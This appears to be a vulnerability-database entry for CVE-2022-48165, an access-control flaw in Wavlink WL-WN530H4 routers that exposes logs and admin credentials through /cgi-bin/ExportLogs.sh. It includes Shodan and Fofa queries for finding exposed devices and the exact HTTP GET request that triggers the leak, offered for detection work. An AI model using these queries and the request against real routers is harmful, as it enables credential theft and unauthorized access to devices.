🔙 목록으로 돌아가기

CVE-2022-48165: Wavlink - Improper Access Control

TitleWavlink - Improper Access Control
AuthorFor3stCo1d
SeverityHigh
ImpactThe vulnerability can lead to unauthorized access, data leakage, or unauthorized actions on the affected device.
RemediationApply the latest firmware update provided by the vendor to fix the access control issue.
CVSS Score7.5
EPSS Score0.79241
CVE IDCVE-2022-48165
CWE IDCWE-284
Shodan Queryhttp.favicon.hash:-1350437236
Fofa Queryicon_hash=-1350437236
Tags cve2022 cve wavlink router exposure vuln

🔍 Vulnerability Description

Wavlink WL-WN530H4 M30H4.V5030.210121 is susceptible to improper access control in the component /cgi-bin/ExportLogs.sh. An attacker can download configuration data and log files, obtain admin credentials, and potentially execute unauthorized operations.

🌐 HTTP Request

GET /cgi-bin/ExportLogs.sh HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-48165.yaml

🦈 Packet Capture: ⬇️ Download cve-2022-48165.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A